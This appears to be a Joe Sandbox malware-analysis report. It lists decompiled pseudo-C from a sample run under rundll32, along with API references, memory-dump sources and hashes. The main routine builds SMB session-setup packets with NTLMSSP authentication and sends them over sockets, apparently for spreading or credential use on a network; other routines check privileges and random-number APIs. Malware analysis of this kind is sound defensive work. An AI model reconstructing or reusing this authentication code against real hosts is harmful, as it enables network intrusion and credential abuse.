                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: CloseProcess$HandleToken$OpenProcess32$AllocateChangeCheckCreateCurrentDuplicateFindFirstFreeInitializeMembershipNextNotificationSnapshotTerminateToolhelp32
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3524103904-0
                                                                                                                                                              • Opcode ID: a77d0215605aacb57f77d2b90100aaf4102fc9302d089a7c2daa9e402fc2c305
                                                                                                                                                              • Instruction ID: 0687c6c447720d85b855b3de78a7e891b36902af147d1ae94cb38f7aa3df36c9
                                                                                                                                                              • Opcode Fuzzy Hash: a77d0215605aacb57f77d2b90100aaf4102fc9302d089a7c2daa9e402fc2c305
                                                                                                                                                              • Instruction Fuzzy Hash: 3EF06D31941534AAEB207BB5AE0DFDE7B6CEB09319F101392E915E2091E734AA448E95
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 68%
                                                                                                                                                              			E04E2554A(void* __ecx, BYTE* _a4, int _a8) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				long** _t8;
                                                                                                                                                              				void* _t14;
                                                                                                                                                              				int _t15;
                                                                                                                                                              
                                                                                                                                                              				_t15 = 0;
                                                                                                                                                              				_v8 = _v8 & 0;
                                                                                                                                                              				_t8 =  &_v8;
                                                                                                                                                              				__imp__CryptAcquireContextW(_t8, 0, 0, 0x18, 0xf0000000, _t14, __ecx); // executed
                                                                                                                                                              				if(_t8 != 0 || GetLastError() == 0x80090016) {
                                                                                                                                                              					_t15 = CryptGenRandom(_v8, _a8, _a4);
                                                                                                                                                              					CryptReleaseContext(_v8, 0);
                                                                                                                                                              				}
                                                                                                                                                              				return _t15;
                                                                                                                                                              			}







                                                                                                                                                              0x04e25556
                                                                                                                                                              0x04e25558
                                                                                                                                                              0x04e2555d
                                                                                                                                                              0x04e25561
                                                                                                                                                              0x04e25569
                                                                                                                                                              0x04e2558c
                                                                                                                                                              0x04e2558e
                                                                                                                                                              0x04e2558e
                                                                                                                                                              0x04e25598

                                                                                                                                                              APIs
                                                                                                                                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,?,?,04E2790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege), ref: 04E25561
                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,04E2790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04E279E8), ref: 04E2556B
                                                                                                                                                              • CryptGenRandom.ADVAPI32(?,?,?,?,?,?,04E2790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04E279E8), ref: 04E25581
                                                                                                                                                              • CryptReleaseContext.ADVAPI32(?,00000000,?,?,?,04E2790E,?,00000004,SeTcbPrivilege,SeDebugPrivilege,SeShutdownPrivilege,?,?,04E279E8), ref: 04E2558E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: Crypt$Context$AcquireErrorLastRandomRelease
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2963463078-0
                                                                                                                                                              • Opcode ID: 2faf21a02b196ffd8de32d3ffc7f62df1a01196e20075dadb03d9f37e28eba7d
                                                                                                                                                              • Instruction ID: 85ff663a470565fa2b6738c6bd0ea225ccf9c897e77f57b429ebad27e6622047
                                                                                                                                                              • Opcode Fuzzy Hash: 2faf21a02b196ffd8de32d3ffc7f62df1a01196e20075dadb03d9f37e28eba7d
                                                                                                                                                              • Instruction Fuzzy Hash: 1EF01C36940208FBDF205BA6EE09F8E7ABAEBC4716F204014F605D2114D6799E11EB64
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 16%
                                                                                                                                                              			E04E25507(intOrPtr _a4) {
                                                                                                                                                              				void* _t3;
                                                                                                                                                              				void* _t7;
                                                                                                                                                              				intOrPtr* _t8;
                                                                                                                                                              
                                                                                                                                                              				_t8 = __imp__CryptAcquireContextW;
                                                                                                                                                              				_t3 =  *_t8(_a4, 0, 0, 0x18, 0xf0000000); // executed
                                                                                                                                                              				_t7 = _t3;
                                                                                                                                                              				if(_t7 == 0 && GetLastError() == 0x80090016) {
                                                                                                                                                              					_t7 =  *_t8(_a4, _t7, _t7, 0x18, 8);
                                                                                                                                                              				}
                                                                                                                                                              				return _t7;
                                                                                                                                                              			}






                                                                                                                                                              0x04e2550c
                                                                                                                                                              0x04e25520
                                                                                                                                                              0x04e25522
                                                                                                                                                              0x04e25526
                                                                                                                                                              0x04e25540
                                                                                                                                                              0x04e25540
                                                                                                                                                              0x04e25547

                                                                                                                                                              APIs
                                                                                                                                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,F0000000,?,00000000,?,04E262C3,?), ref: 04E25520
                                                                                                                                                              • GetLastError.KERNEL32(?,04E262C3,?), ref: 04E25528
                                                                                                                                                              • CryptAcquireContextW.ADVAPI32(?,00000000,00000000,00000018,00000008,?,04E262C3,?), ref: 04E2553E
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: AcquireContextCrypt$ErrorLast
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 2779411412-0
                                                                                                                                                              • Opcode ID: 2fe094c589ddbe57a724890eb04b9f58ece07c5ca8384ee3b6e11afa0d744b92
                                                                                                                                                              • Instruction ID: a173a15464c09759bf449219ab3c4667fb109d8ebeffeccc31882d57ab8ab58e
                                                                                                                                                              • Opcode Fuzzy Hash: 2fe094c589ddbe57a724890eb04b9f58ece07c5ca8384ee3b6e11afa0d744b92
                                                                                                                                                              • Instruction Fuzzy Hash: A0E0DF717C422E3AFB201D899D81F663A8DDB18759F108022F300E6090CAD1AC0017A4
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              C-Code - Quality: 37%
                                                                                                                                                              			E04E27D4E(void* __ecx) {
                                                                                                                                                              				signed int _v8;
                                                                                                                                                              				void** _t9;
                                                                                                                                                              				signed char _t12;
                                                                                                                                                              				void* _t14;
                                                                                                                                                              				void* _t15;
                                                                                                                                                              				void* _t16;
                                                                                                                                                              
                                                                                                                                                              				_t9 =  &_v8;
                                                                                                                                                              				_t16 = 0;
                                                                                                                                                              				_v8 = _v8 & 0;
                                                                                                                                                              				__imp__NetServerGetInfo(0, 0x65, _t9, _t15, __ecx); // executed
                                                                                                                                                              				_t14 = _v8;
                                                                                                                                                              				if(_t9 == 0) {
                                                                                                                                                              					_t12 =  *(_t14 + 0x10);
                                                                                                                                                              					if((_t12 & 0x00008000) != 0 || (_t12 & 0x00000018) != 0) {
                                                                                                                                                              						_t16 = 1;
                                                                                                                                                              					}
                                                                                                                                                              				}
                                                                                                                                                              				if(_t14 != 0) {
                                                                                                                                                              					NetApiBufferFree(_t14);
                                                                                                                                                              				}
                                                                                                                                                              				return _t16;
                                                                                                                                                              			}









                                                                                                                                                              0x04e27d53
                                                                                                                                                              0x04e27d57
                                                                                                                                                              0x04e27d59
                                                                                                                                                              0x04e27d5f
                                                                                                                                                              0x04e27d65
                                                                                                                                                              0x04e27d6a
                                                                                                                                                              0x04e27d6c
                                                                                                                                                              0x04e27d74
                                                                                                                                                              0x04e27d7c
                                                                                                                                                              0x04e27d7c
                                                                                                                                                              0x04e27d74
                                                                                                                                                              0x04e27d7f
                                                                                                                                                              0x04e27d82
                                                                                                                                                              0x04e27d82
                                                                                                                                                              0x04e27d8c

                                                                                                                                                              APIs
                                                                                                                                                              • NetServerGetInfo.NETAPI32(00000000,00000065,?,7404C4E0,?,?,04E28C7C), ref: 04E27D5F
                                                                                                                                                              • NetApiBufferFree.NETAPI32(?,?,?,04E28C7C), ref: 04E27D82
                                                                                                                                                              Memory Dump Source
                                                                                                                                                              • Source File: 00000014.00000002.675033905.0000000004E21000.00000020.00001000.00020000.00000000.sdmp, Offset: 04E20000, based on PE: true
                                                                                                                                                              • Associated: 00000014.00000002.675021183.0000000004E20000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.690048588.0000000004E2D000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.700531229.0000000004E33000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              • Associated: 00000014.00000002.703890897.0000000004E39000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                              • Snapshot File: hcaresult_20_2_4e20000_rundll32.jbxd
                                                                                                                                                              Similarity
                                                                                                                                                              • API ID: BufferFreeInfoServer
                                                                                                                                                              • String ID:
                                                                                                                                                              • API String ID: 3855943681-0
                                                                                                                                                              • Opcode ID: 48476a80894393ecebc7b0e7f287ee643d44e73cdd03693a0c081e62c2f3e9b8
                                                                                                                                                              • Instruction ID: b98407706d8c0b0134504ff692cfcb4b8e8c25954744962b71e6bc860dc816c3
                                                                                                                                                              • Opcode Fuzzy Hash: 48476a80894393ecebc7b0e7f287ee643d44e73cdd03693a0c081e62c2f3e9b8
                                                                                                                                                              • Instruction Fuzzy Hash: 29E09272701638A7EB34CA96CE08FBA766CDF42AAAB001119AD41E2140E321EE0186E0
                                                                                                                                                              Uniqueness

                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                              Control-flow Graph

                                                                                                                                                              • Executed
                                                                                                                                                              • Not Executed
                                                                                                                                                              control_flow_graph 0 4e21747-4e21757 1 4e2175a-4e21763 0->1 1->1 2 4e21765-4e21795 GetProcessHeap HeapAlloc 1->2 3 4e21c30-4e21c37 2->3 4 4e2179b-4e217a0 2->4 5 4e217a2-4e217af 4->5 5->5 6 4e217b1-4e217bb CharUpperW 5->6 7 4e217be-4e217c7 6->7 7->7 8 4e217c9-4e217e6 GetProcessHeap HeapAlloc 7->8 9 4e21c22-4e21c2a GetProcessHeap HeapFree 8->9 10 4e217ec-4e2184b htons 8->10 9->3 11 4e2184e-4e21857 10->11 11->11 12 4e21859-4e2186b send 11->12 13 4e21871-4e2188a recv 12->13 14 4e21c16-4e21c1c GetProcessHeap HeapFree 12->14 13->14 15 4e21890-4e218a5 13->15 14->9 15->14 16 4e218ab-4e218ad 15->16 17 4e218ae-4e218c1 16->17 18 4e218c3-4e218c5 17->18 19 4e218ce-4e218d2 17->19 18->19 20 4e218c7-4e218cc 18->20 19->17 21 4e218d4 19->21 20->19 22 4e218d9-4e21904 GetProcessHeap HeapAlloc 20->22 21->14 22->14 23 4e2190a-4e21926 call 4e215a7 22->23 26 4e21c08-4e21c10 GetProcessHeap HeapFree 23->26 27 4e2192c-4e21948 call 4e215a7 23->27 26->14 27->26 30 4e2194e-4e21962 GetProcessHeap HeapAlloc 27->30 31 4e21bfa-4e21c02 GetProcessHeap HeapFree 30->31 32 4e21968-4e2197c 30->32 31->26 33 4e21983-4e21994 rand 32->33 33->33 34 4e21996-4e219ae call 4e215a7 33->34 37 4e219b4-4e219c2 GetProcessHeap HeapAlloc 34->37 38 4e21bec-4e21bf4 GetProcessHeap HeapFree 34->38 39 4e219c8-4e219e5 37->39 40 4e21bde-4e21be6 GetProcessHeap HeapFree 37->40 38->31 41 4e219e7-4e219ed 39->41 42 4e219f4-4e21a08 39->42 40->38 41->42 43 4e21a0a 42->43 44 4e21a0e-4e21a20 GetProcessHeap RtlAllocateHeap 42->44 43->44 45 4e21bc3-4e21bdb HeapFree 44->45 46 4e21a26-4e21a74 htons 44->46 45->40 47 4e21a76-4e21a79 46->47 48 4e21a7d-4e21ad1 46->48 47->48 50 4e21ad3-4e21b0c 48->50 51 4e21b0e-4e21b2d 48->51 52 4e21b31-4e21b55 memcpy 50->52 51->52 53 4e21b66-4e21b6f 52->53 54 4e21b57-4e21b64 52->54 55 4e21b71-4e21b82 send 53->55 54->55 56 4e21bb3-4e21bbd HeapFree 55->56 57 4e21b84-4e21b9b recv 55->57 56->45 57->56 58 4e21b9d-4e21ba1 57->58 60 4e21ba3 58->60 61 4e21ba7-4e21bb0 memset 58->61 60->61 61->56
                                                                                                                                                              C-Code - Quality: 80%
                                                                                                                                                              			E04E21747(intOrPtr _a4, void** _a8, long _a12, void* _a16, signed int _a20, void* _a24) {
                                                                                                                                                              				char _v5;
                                                                                                                                                              				signed int _v12;
                                                                                                                                                              				int _v16;
                                                                                                                                                              				void* _v20;
                                                                                                                                                              				void* _v24;
                                                                                                                                                              				void* _v28;
                                                                                                                                                              				void* _v32;
                                                                                                                                                              				void* _v36;
                                                                                                                                                              				void* _v40;
                                                                                                                                                              				void _v44;
                                                                                                                                                              				void* _v48;
                                                                                                                                                              				intOrPtr* _t165;
                                                                                                                                                              				signed short _t168;
                                                                                                                                                              				int _t170;
                                                                                                                                                              				signed short* _t175;
                                                                                                                                                              				intOrPtr* _t177;
                                                                                                                                                              				void* _t187;
                                                                                                                                                              				short _t189;
                                                                                                                                                              				short _t193;
                                                                                                                                                              				signed char* _t194;
                                                                                                                                                              				void* _t198;
                                                                                                                                                              				void* _t201;
                                                                                                                                                              				signed int _t205;
                                                                                                                                                              				void* _t209;
                                                                                                                                                              				void* _t212;
                                                                                                                                                              				long _t215;
                                                                                                                                                              				int _t216;
                                                                                                                                                              				void* _t218;
                                                                                                                                                              				void* _t222;
                                                                                                                                                              				void* _t229;
                                                                                                                                                              				void* _t235;
                                                                                                                                                              				short _t237;
                                                                                                                                                              				short _t240;
                                                                                                                                                              				char _t244;
                                                                                                                                                              				char _t245;
                                                                                                                                                              				char _t246;
                                                                                                                                                              				short _t250;
                                                                                                                                                              				void* _t253;
                                                                                                                                                              				void* _t257;
                                                                                                                                                              				short _t258;
                                                                                                                                                              				intOrPtr _t261;
                                                                                                                                                              				void* _t264;
                                                                                                                                                              				void* _t266;
                                                                                                                                                              				signed int _t267;
                                                                                                                                                              				void* _t268;
                                                                                                                                                              				signed int _t269;
                                                                                                                                                              				void* _t271;
                                                                                                                                                              				intOrPtr* _t282;
                                                                                                                                                              				signed int _t285;
                                                                                                                                                              				intOrPtr _t288;
                                                                                                                                                              				signed int _t289;
                                                                                                                                                              				short _t292;
                                                                                                                                                              				intOrPtr _t293;
                                                                                                                                                              				WCHAR* _t294;
                                                                                                                                                              				intOrPtr _t295;
                                                                                                                                                              				signed char _t297;
                                                                                                                                                              				signed int _t300;
                                                                                                                                                              				intOrPtr _t302;
                                                                                                                                                              				void* _t304;
                                                                                                                                                              				void* _t305;
                                                                                                                                                              				signed int* _t308;
                                                                                                                                                              				void* _t309;
                                                                                                                                                              				void* _t315;
                                                                                                                                                              				void* _t319;
                                                                                                                                                              				void* _t321;
                                                                                                                                                              				void* _t322;
                                                                                                                                                              				signed short _t325;
                                                                                                                                                              				void* _t328;
                                                                                                                                                              				void* _t329;
                                                                                                                                                              				void* _t330;
                                                                                                                                                              				void* _t331;
                                                                                                                                                              
                                                                                                                                                              				_t165 = _a16;
                                                                                                                                                              				_v5 = 0;
                                                                                                                                                              				_t266 = _t165 + 2;
                                                                                                                                                              				do {
                                                                                                                                                              					_t293 =  *_t165;
                                                                                                                                                              					_t165 = _t165 + 2;
                                                                                                                                                              				} while (_t293 != 0);
                                                                                                                                                              				_t168 = _t165 - _t266 >> 0x00000001 & 0x0000ffff;
                                                                                                                                                              				_v12 = _t168;
                                                                                                                                                              				_t170 = (_t168 & 0x0000ffff) + (_t168 & 0x0000ffff);
                                                                                                                                                              				_v16 = _t170;
                                                                                                                                                              				_t294 = HeapAlloc(GetProcessHeap(), 8, _t170 + 2);
                                                                                                                                                              				_v36 = _t294;
                                                                                                                                                              				if(_t294 == 0) {
                                                                                                                                                              					L53:
                                                                                                                                                              					return _v5;
                                                                                                                                                              				}
                                                                                                                                                              				_t175 = _a16;
                                                                                                                                                              				_t304 = _t294 - _t175;
                                                                                                                                                              				do {
                                                                                                                                                              					_t267 =  *_t175 & 0x0000ffff;
                                                                                                                                                              					 *(_t304 + _t175) = _t267;
                                                                                                                                                              					_t175 =  &(_t175[1]);
                                                                                                                                                              				} while (_t267 != 0);
                                                                                                                                                              				CharUpperW(_t294);
                                                                                                                                                              				_t177 = _a20;
                                                                                                                                                              				_t268 = _t177 + 2;
                                                                                                                                                              				do {
                                                                                                                                                              					_t295 =  *_t177;
                                                                                                                                                              					_t177 = _t177 + 2;
                                                                                                                                                              				} while (_t295 != 0);
                                                                                                                                                              				_v32 = _t177 - _t268 >> 0x00000001 & 0x0000ffff;
                                                                                                                                                              				_t305 = HeapAlloc(GetProcessHeap(), 8, 0x86);
                                                                                                                                                              				_v28 = _t305;
                                                                                                                                                              				if(_t305 == 0) {
                                                                                                                                                              					L52:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v36);
                                                                                                                                                              					goto L53;
                                                                                                                                                              				}
                                                                                                                                                              				_t321 =  *_a8;
                                                                                                                                                              				_t269 = 9;
                                                                                                                                                              				 *((short*)(_t321 + 0x20)) = 0;
                                                                                                                                                              				_t187 = memcpy(_t305, _t321, _t269 << 2);
                                                                                                                                                              				_t329 = _t328 + 0xc;
                                                                                                                                                              				__imp__#9(0x82);
                                                                                                                                                              				_t322 = _v28;
                                                                                                                                                              				 *(_t322 + 2) = _t187;
                                                                                                                                                              				 *((short*)(_t322 + 0x29)) = 0x1104;
                                                                                                                                                              				_t189 = 2;
                                                                                                                                                              				 *((short*)(_t322 + 0x2b)) = _t189;
                                                                                                                                                              				_t271 = 0x42;
                                                                                                                                                              				 *((short*)(_t322 + 0x2d)) = 1;
                                                                                                                                                              				 *((short*)(_t322 + 0x33)) = 0;
                                                                                                                                                              				_t193 = 0x47;
                                                                                                                                                              				 *((short*)(_t322 + 0x3d)) = _t193;
                                                                                                                                                              				 *((char*)(_t322 + 8)) = 0x73;
                                                                                                                                                              				 *((short*)(_t322 + 0x24)) = 0xff0c;
                                                                                                                                                              				 *((intOrPtr*)(_t322 + 0x39)) = 0x8000c044;
                                                                                                                                                              				_t308 = 0x4e335f0;
                                                                                                                                                              				_t194 = _t322 + 0x3f;
                                                                                                                                                              				do {
                                                                                                                                                              					_t297 =  !( *_t308);
                                                                                                                                                              					_t308 =  &(_t308[0]);
                                                                                                                                                              					 *_t194 = _t297;
                                                                                                                                                              					_t194 =  &(_t194[1]);
                                                                                                                                                              					_t271 = _t271 - 1;
                                                                                                                                                              				} while (_t271 != 0);
                                                                                                                                                              				__imp__#19(_a4, _t322, 0x86, _t271); // executed
                                                                                                                                                              				if(_t194 <= 0) {
                                                                                                                                                              					L51:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _t322);
                                                                                                                                                              					goto L52;
                                                                                                                                                              				}
                                                                                                                                                              				_t309 = _a24;
                                                                                                                                                              				__imp__#16(_a4, _t309, 0xffff, 0); // executed
                                                                                                                                                              				if(_t194 <= 0x84) {
                                                                                                                                                              					goto L51;
                                                                                                                                                              				}
                                                                                                                                                              				 *((short*)( *_a8 + 0x20)) =  *((intOrPtr*)(_t309 + 0x20));
                                                                                                                                                              				if( *((intOrPtr*)(_t309 + 9)) != 0xc0000016) {
                                                                                                                                                              					goto L51;
                                                                                                                                                              				}
                                                                                                                                                              				_t198 = 0x2d;
                                                                                                                                                              				while(1) {
                                                                                                                                                              					_t300 =  *(_t198 + _t309 + 4) ^ 0x00505353;
                                                                                                                                                              					if(( *(_t198 + _t309) ^ 0x4d4c544e) == 0 && _t300 == 0 &&  *((intOrPtr*)(_t198 + _t309 + 8)) == 2) {
                                                                                                                                                              						break;
                                                                                                                                                              					}
                                                                                                                                                              					_t198 = _t198 + 1;
                                                                                                                                                              					if(_t198 < 0x70) {
                                                                                                                                                              						continue;
                                                                                                                                                              					}
                                                                                                                                                              					goto L51;
                                                                                                                                                              				}
                                                                                                                                                              				_v44 =  *((intOrPtr*)(_t198 + _t309 + 0x18));
                                                                                                                                                              				_v40 =  *((intOrPtr*)(_t198 + _t309 + 0x1c));
                                                                                                                                                              				 *_a12 =  *((intOrPtr*)(_t198 + _t309 + 0x30));
                                                                                                                                                              				_t201 = HeapAlloc(GetProcessHeap(), 8, 0x18);
                                                                                                                                                              				_v24 = _t201;
                                                                                                                                                              				if(_t201 == 0) {
                                                                                                                                                              					goto L51;
                                                                                                                                                              				}
                                                                                                                                                              				_t205 = E04E215A7(_a20, (_v32 & 0x0000ffff) + (_v32 & 0x0000ffff), 0,  &_v24, 0x8002); // executed
                                                                                                                                                              				if(_t205 != 0) {
                                                                                                                                                              					L50:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _v24);
                                                                                                                                                              					goto L51;
                                                                                                                                                              				}
                                                                                                                                                              				_a20 = _a20 & _t205;
                                                                                                                                                              				_t209 = E04E215A7(_v36, _v16, _v24,  &_a20, 0x8003); // executed
                                                                                                                                                              				if(_t209 != 0) {
                                                                                                                                                              					goto L50;
                                                                                                                                                              				}
                                                                                                                                                              				_v48 = _a20;
                                                                                                                                                              				_t212 = HeapAlloc(GetProcessHeap(), 8, 0x10);
                                                                                                                                                              				_v32 = _t212;
                                                                                                                                                              				if(_t212 == 0) {
                                                                                                                                                              					L49:
                                                                                                                                                              					HeapFree(GetProcessHeap(), 8, _a20);
                                                                                                                                                              					goto L50;
                                                                                                                                                              				}
                                                                                                                                                              				 *_t212 = _v44;
                                                                                                                                                              				 *((intOrPtr*)(_t212 + 4)) = _v40;
                                                                                                                                                              				_t215 = _t212 + 8;
                                                                                                                                                              				_v40 = _t215;
                                                                                                                                                              				_a12 = _t215;
                                                                                                                                                              				_v20 = 8;
                                                                                                                                                              				do {
                                                                                                                                                              					_t216 = rand();
                                                                                                                                                              					_a12 = _a12 + 1;
                                                                                                                                                              					_t70 =  &_v20;
                                                                                                                                                              					 *_t70 = _v20 - 1;
                                                                                                                                                              					 *_a12 = _t216;
                                                                                                                                                              				} while ( *_t70 != 0);
                                                                                                                                                              				_t218 = E04E215A7(_v32, 0x10, _a20,  &_a20, 0x8003); // executed
                                                                                                                                                              				if(_t218 == 0) {
                                                                                                                                                              					_t222 = HeapAlloc(GetProcessHeap(), 8, 0x18);
                                                                                                                                                              					_v20 = _t222;
                                                                                                                                                              					if(_t222 != 0) {
                                                                                                                                                              						_t282 = _v40;
                                                                                                                                                              						asm("movsd");
                                                                                                                                                              						asm("movsd");
                                                                                                                                                              						asm("movsd");
                                                                                                                                                              						asm("movsd");
                                                                                                                                                              						 *((intOrPtr*)(_t222 + 0x10)) =  *_t282;
                                                                                                                                                              						 *((intOrPtr*)(_t222 + 0x14)) =  *((intOrPtr*)(_t282 + 4));
                                                                                                                                                              						if(0 == _v12) {
                                                                                                                                                              							 *_t222 = 0x55004e;
                                                                                                                                                              							 *((intOrPtr*)(_t222 + 4)) = 0x4c004c;
                                                                                                                                                              						}
                                                                                                                                                              						_a12 = (_v12 & 0x0000ffff) + (_v12 & 0x0000ffff) + 0xa4;
                                                                                                                                                              						if(0 == _v12) {
                                                                                                                                                              							_a12 = _a12 - 0x10;
                                                                                                                                                              						}
                                                                                                                                                              						_t229 = RtlAllocateHeap(GetProcessHeap(), 8, _a12); // executed
                                                                                                                                                              						_t264 = _t229;
                                                                                                                                                              						if(_t264 != 0) {
                                                                                                                                                              							_t285 = 9;
                                                                                                                                                              							_t235 = memcpy(_t264,  *_a8, _t285 << 2);
                                                                                                                                                              							_t330 = _t329 + 0xc;
                                                                                                                                                              							__imp__#9(_a12 + 0xfffffffc);
                                                                                                                                                              							_t325 = _v12;
                                                                                                                                                              							 *(_t264 + 2) = _t235;
                                                                                                                                                              							 *((short*)(_t264 + 0x29)) = 0x1104;
                                                                                                                                                              							_t237 = 2;
                                                                                                                                                              							 *((short*)(_t264 + 0x2b)) = _t237;
                                                                                                                                                              							 *((short*)(_t264 + 0x2d)) = 1;
                                                                                                                                                              							_t240 = _t325 + _t325 + 0x60;
                                                                                                                                                              							 *((char*)(_t264 + 8)) = 0x73;
                                                                                                                                                              							 *((short*)(_t264 + 0x24)) = 0xff0c;
                                                                                                                                                              							 *((short*)(_t264 + 0x33)) = _t240;
                                                                                                                                                              							if(0 == _t325) {
                                                                                                                                                              								 *((short*)(_t264 + 0x33)) = _t240 + 0xfffffff0;
                                                                                                                                                              							}
                                                                                                                                                              							 *((short*)(_t264 + 0x3d)) =  *((intOrPtr*)(_t264 + 0x33)) + 5;
                                                                                                                                                              							_t244 =  *((intOrPtr*)(_t264 + 0x33)) - 2;
                                                                                                                                                              							 *((char*)(_t264 + 0x40)) = _t244;
                                                                                                                                                              							_t245 = _t244 - 2;
                                                                                                                                                              							 *((char*)(_t264 + 0x42)) = _t245;
                                                                                                                                                              							_t246 = _t245 - 2;
                                                                                                                                                              							 *((char*)(_t264 + 0x44)) = _t246;
                                                                                                                                                              							 *((char*)(_t264 + 0x46)) = _t246 - 2;
                                                                                                                                                              							 *((intOrPtr*)(_t264 + 0x39)) = 0x8000c044;
                                                                                                                                                              							 *((char*)(_t264 + 0x3f)) = 0xa1;
                                                                                                                                                              							 *((char*)(_t264 + 0x41)) = 0x30;
                                                                                                                                                              							 *((char*)(_t264 + 0x43)) = 0xa2;
                                                                                                                                                              							 *((char*)(_t264 + 0x45)) = 4;
                                                                                                                                                              							 *((intOrPtr*)(_t264 + 0x47)) = 0x4d4c544e;
                                                                                                                                                              							 *((intOrPtr*)(_t264 + 0x4b)) = 0x505353;
                                                                                                                                                              							 *((intOrPtr*)(_t264 + 0x4f)) = 3;
                                                                                                                                                              							if(0 == _t325) {
                                                                                                                                                              								_t288 = 0x48;
                                                                                                                                                              								_push(0x40);
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x67)) = 0;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x6f)) = 0;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x77)) = 0;
                                                                                                                                                              								_t250 = 8;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x57)) = _t288;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x5f)) = _t288;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x7f)) = _t288;
                                                                                                                                                              								 *((short*)(_t264 + 0x73)) = _t250;
                                                                                                                                                              								 *((short*)(_t264 + 0x75)) = _t250;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t258 = 0x18;
                                                                                                                                                              								 *((short*)(_t264 + 0x53)) = _t258;
                                                                                                                                                              								 *((short*)(_t264 + 0x55)) = _t258;
                                                                                                                                                              								_t302 = 0x68;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x57)) = (_t325 & 0x0000ffff) + (_t325 & 0x0000ffff) + 0x40;
                                                                                                                                                              								_t261 = 0x40;
                                                                                                                                                              								_t292 = _t325 + _t325;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x5f)) = _t302;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x67)) = _t261;
                                                                                                                                                              								 *((short*)(_t264 + 0x6b)) = _t292;
                                                                                                                                                              								 *((short*)(_t264 + 0x6d)) = _t292;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x6f)) = _t261;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x77)) = 0x50;
                                                                                                                                                              								 *((intOrPtr*)(_t264 + 0x7f)) = _t302;
                                                                                                                                                              							}
                                                                                                                                                              							_t142 = _t264 + 0x87; // 0x87
                                                                                                                                                              							_t315 = _t142;
                                                                                                                                                              							 *((intOrPtr*)(_t264 + 0x83)) = 0xa0880205;
                                                                                                                                                              							memcpy(_t315, _a16, _v16);
                                                                                                                                                              							_t331 = _t330 + 0xc;
                                                                                                                                                              							if(0 != _t325) {
                                                                                                                                                              								_t289 = 6;
                                                                                                                                                              								_t253 = memcpy(_t315 + _v16, _v20, _t289 << 2);
                                                                                                                                                              								_t331 = _t331 + 0xc;
                                                                                                                                                              							} else {
                                                                                                                                                              								_t257 = _v20;
                                                                                                                                                              								 *_t315 =  *_t257;
                                                                                                                                                              								_t253 =  *(_t257 + 4);
                                                                                                                                                              								 *(_t315 + 4) = _t253;
                                                                                                                                                              							}
                                                                                                                                                              							__imp__#19(_a4, _t264, _a12, 0); // executed
                                                                                                                                                              							if(_t253 > 0) {
